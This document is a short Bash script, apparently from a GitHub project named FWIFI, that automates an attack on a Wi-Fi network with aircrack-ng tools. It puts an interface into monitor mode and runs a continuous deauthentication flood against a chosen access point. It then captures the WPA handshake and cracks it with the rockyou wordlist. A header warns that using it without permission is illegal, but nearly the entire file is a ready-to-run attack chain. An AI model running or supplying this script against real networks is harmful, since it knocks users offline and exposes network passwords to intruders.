#!/bin/bash
#---------------------------------------------------------------------------------------------------------------------------
#
# Name : FWIFI
# Description : FWIFI is a Bash script designed to perform a series of penetration tests on Wi-Fi networks.
# Author: rofidoang03
#
#---------------------------------------------------------------------------------------------------------------------------
#
# Github: https://github.com/rofidoang03/FWIFI
#
#---------------------------------------------------------------------------------------------------------------------------
#
# - WARNING -
#
# Using this script on networks you do not own without permission is illegal.
# Make sure you have permission from the network owner before conducting penetration tests.
# Misuse of this tool may violate the law and the privacy of others.
# Users are fully responsible for the actions taken using this script.
#
#---------------------------------------------------------------------------------------------------------------------------

read -p "Enter the wireless interface name: " interface
airmon-ng check kill
airmon-ng start "$interface"
airodump-ng "$interface"
read -p "Enter the BSSID of the target network: " bssid
read -p "Enter the Channel number: " channel
iwconfig "$interface" channel "$channel"
timestamp=$(date +"%Y-%m-%d_%H:%M:%S")
output_dir="pcap_files"
mkdir -p "$output_dir"
output_file="${output_dir}/${bssid}_${timestamp}"
xterm -e "aireplay-ng -0 0 -a $bssid $interface" & sleep 1 && xterm -e "airodump-ng --bssid $bssid -c $channel -w $output_file $interface" &
pcap_file="${output_file}-01.cap"
aircrack-ng -w "wordlists/rockyou.txt" "$pcap_file"
exit 0
